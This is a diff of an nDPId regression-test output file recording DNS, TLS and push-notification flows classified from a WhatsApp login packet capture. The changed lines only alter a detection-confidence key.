-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227604,"flow_last_seen":1432582227604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227604,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432582227604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227604,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZF5AAEAGme\/AqAIEEbJoDMAxAbvjm5\/WAAAAALAC\/\/9XjAAAAgQFtAEDAwQBAQgKLfovrgAAAAAEAgAA"} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432582227624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582227624,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+d\/oAAEARfN\/AqAIBwKgCBAA1y94AqhSs36OBgAABAAgAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAC20ABJ5V6TTADAABAAEAAAttAASeVTpKwAwAAQABAAALbQAEuK2zJ8AMAAEAAQAAC20ABJ5VOnfADAABAAEAAAttAAS4rbMlwAwAAQABAAALbQAEnlU6M8AMAAEAAQAAC20ABK4k0i3ADAABAAEAAAttAASeVQXI"} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227643,"flow_last_seen":1432582227643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227643,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1432582227643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227643,"pkt":"xiwDYGpkAPS5Jrv0CABFAABACXVAAEAGAsTAqAIEuK2zJcAyFGaCPuKZAAAAALAC\/\/9xPwAAAgQFtAEDAwQBAQgKLfov1AAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432582227797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582227797,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8rYsAADQGqrG4rbMlwKgCBBRmwDLYm8Xcgj7imqAS\/\/9JMQAAAgQFrAEDAwkEAggKD\/GKmy36L9Q="} @@ -62,22 +62,22 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1432582227885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227885,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0779AAEAGHIXAqAIEuK2zJcAyFGaCPuKa2JvF3YAQIFhWrQAAAQEICi36MMYP8Yqb"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432582227886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227886,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0rZoAAO4G4r4RsmgMwKgCBAG7wDE71dh745uf14ASH\/64\/gAAAgQFoAEDAwQBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432582227887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582227887,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo79dAAEAGDo7AqAIEEbJoDMAxAbvjm5\/XO9XYfFAQQADZtwAA"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432582228152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228152,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UDkAAO4GQB4RsmgOwKgCBAG7wDON4auhp3wzpIASH\/48GwAAAgQFoAEDAwQBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1432582228167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582228167,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoC8AAAEAGMqTAqAIEEbJoDsAzAbunfDOkAAAAAFAEAADWZAAA"} -01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} +01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1432582228503,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXUnXJAAEAG3ojAqAIEEW7lDsApFGe4aEuG1IsaTIAQIAA3PgAAAQEICi36MxJvhmvfFwMBACDgnfLWgV8g\/pw7jjX\/\/3ZDH1tB+gK1jE9k\/rmu6RmKPhcDAQdQwvKiQZwynx6ML8uHDg8WgbZIBNPdSiBPAiHm7VZMSxjHJ7BGJ8hRCNCOXC6LyliytHBkvL\/WQAE0iyMMgIlOMed9vHW1FQrPwtxifubqT35jWP9Nwm9hOQ2sUXPF6J6ZcqeRRxjts4LAxUp+ZVHbqO88UycvtArFRoKmsjwuTsOHFL0h\/BX9z3nWEUxaS9mVyhudzOuBlhf3aNgcppeJ3Mr6DsSPYDWrJ1Ko6GUQ6Mz7WhKyRp+OhCR+8vNcJ+2CIpa9aPiStGZvZFFuJ5eoJiBK6lrgPDyxxPa\/Z82Zx7iZHY+\/ajmPTXvQU4j7rC5OlL\/ZO1JkHVVmXmK1\/n5cUDYPvmxuWKEEWDx8eNxgRC58OMj0i5sHQHDG+ZLwIW4R3Ebyfp++7DjTwhy7uHM9lVzOAa6qgVVbeWZWLm5Zp4udgSHyIGs6plbNOhN8Lb7TTV3BFKBjCbwxtnCR+8lPTlOVAewtoM48Z0qRSJODl9LDmyJOnkTl+LQlbM7hWhZq\/VVyYDivHB+RnYZFdt7ZvWbMsFi9dXD6LjMsdLkj0RU\/SFA5gXvUGWy9x04Yo\/WqRH7ng0WIs\/oAxdVKAH0RL\/egfgAwRrcRgu3dPMqb8b19+PmNfa+WFGFnW0JLuexKCM9POmeD5yw6nk\/ac9Raq2rKcykqXxndrastmOjTbplC4qeRqr0LASV9tRAtG4WvYwC\/dfTiBawq859mBNGrglJvult9KPMKQPFULDG6x+KBv4eYpxjRc54qoabZQMWqqc+\/C0Emvy+eYJXsquvu+83ilyZ2N5sYlJ92HKH8JfE8JTIg5o3c9zLm5ZWhw8+NmQMwd0i5bU9vg06cROWuAG\/JN1YaR0pdUTITubm5mlduwzPQc2BVmXII2GZu105+s7qlJpQzMmRVjoqYtbOeWHJKIQ4UQdZCqzpz4AcWUN7LNHzsfvI5B8mXgc+B7aL8Y8jc2YqBmFk1dHfnjKeYCxGmRBZHJy7WbY9uViabjXvTq6pmYIGh+8lsYGwBwhWNapwWuc8Bw0b65ZKVGVcMKolOabscbWi+EYPJjuvFKgqZscrMC1dXZUtfdGPsPdXUlxbBMQ2Kup7KMqRXjqDlL2rJPpRC\/J6FfjQ+IKNfM\/RVAKV8teQWPRPthAH1FIrtEy51cDQixMgza8uftMRBKRfqEYXF7XVD5164o\/Mck2RudrQlyQmifMkcXuuW1kb2sTQoTz3p0Ox09YvEjxH+5SXf2MqAQ5cwiqd8fGHwSVuprE4y5B+B+0nEsRucTP\/97X6ZaOAcSRCuPQgdHN1NHCSQ8002IEFsPCRXQaWhb\/8KMjfJXXs1I3Eouoy5fGg9Eon7zV6InzJDOtmcVxRzUBgfDR1DGBIMOusKSnnAX1htfNBhCsM31KRySVA9BnU7p8tKS\/3BfJCTQQBoGTP2MoOxAiFKkSgXEh3w0kC\/x4kpimxmzxtGXOOQBZWNBgxyNTYgb0Sf9nOE+sqmGbSG7xueIM5u7Dd864xcMPmVsE1VcOkz2PMHbXIHe+roLyX2aqyb6Yu22cChJiPbSlY+mRr9siD+E7u3KnznXJcpEJBSd3utMm4QryOQBR9FCdalU2IyjVmAb148IpK6Ghgjmw7oVrHdCZXaVw+zfL1FhqC9Bd1VFHiBGm211UlGgrjedJW7mv5NM2z0cPLUMCaZycFw6G4KQN6aDAE1rL1eqhrIxxsuhCw0HsrKiJLLdGsa1+3Rf\/uEKt1c0Ng9dAzkrCJEwEwHx3trkLyhj9\/ja7mEqYBSp5Sx0mCtwBbfi6wnI8gTgb3WlgH0Ha3ke8bRCbeKw4dCUR0GSPUQYm4lO6VKKERImy3aoUDOHbtquSKZKUtb1hVt"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1432582228504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":540,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":540,"pkt_l4_len":506,"thread_ts_msec":1432582228504,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIO1F9AAEAGq2HAqAIEEW7lDsApFGe4aFEm1IsaTIAYIACssAAAAQEICi36MxJvhmvfY2JtdD6CZ3s26zaizYDBa1\/xV9+nfluOxtxa1tx195Jafsz52yXEOESrPvfo4L8JAAp0DYIaansHyOlB83T10iMEgMWpntVaGhVYz7Ui4c09FkbWN9q+65\/aqUq4TUrgzMyqE5QUWhXZSc\/uGC0icKHu+b2FL4NHGUs7nYDs8Xc0v0flHk5486jecRIc\/ROiqHyACG3C0wwDLYD5dPHsc+oO3YTdMQHp\/Y5aWShkoF9bF0dA6YegCOYLbVQKFU7DAdWxqhRRjje8xXf+tC7iVD+agcMxzHZHBdPvzUlsa6Hnp2KvOrzs9LBI3\/AlWnTDSOZNp+mWgK4MB2zxE5cEBsbimybYF8snsRtPtIBkMUfF1XAd9wg4sSCboXV1ik63xPuzTMdOxIRWWE26PTSksHKRu47JqvdF18Y85LvvQvIIft9jAMxZNM1JpDNK3xHTwcbI8OJ5ZzkwaDArtx1Yo+du+Za4kNeW1j1f7jlL58\/xs\/9pH231BKAPZrpjtiVLnSRVafACBd5M5lgbO1u\/aSBlmIQ\/UK6DM\/jen1DGM+xWiz3ABAYXKSpL6XfsJZ+dpwtcFktAw18x3fF8GSC0\/zgV+SA55WfIkN+qTLtYiq6ct7jHTceCT8cS"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432582228753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228753,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JuMAAC8Gq7gRbuUOwKgCBBRnwCnUixpMuGhRJoAQAQ6R7QAAAQEICm+GjQ4t+jMS"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582230648,"flow_last_seen":1432582230648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582230648,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1432582230648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582230648,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZppAAEAGvV7AqAIEEa1CZsA0AbuMr4Y\/AAAAALAC\/\/\/iDQAAAgQFtAEDAwQBAQgKLfo7WAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432582230787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582230787,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0jEsAAO8GKLkRrUJmwKgCBAG7wDR81DyUjK+GQIASH\/6qEgAAAgQFoAEDAwQBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1432582230854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582230854,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLotAAEAG9YXAqAIEEa1CZsA0AbuMr4ZAfNQ8lVAQQADKywAA"} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 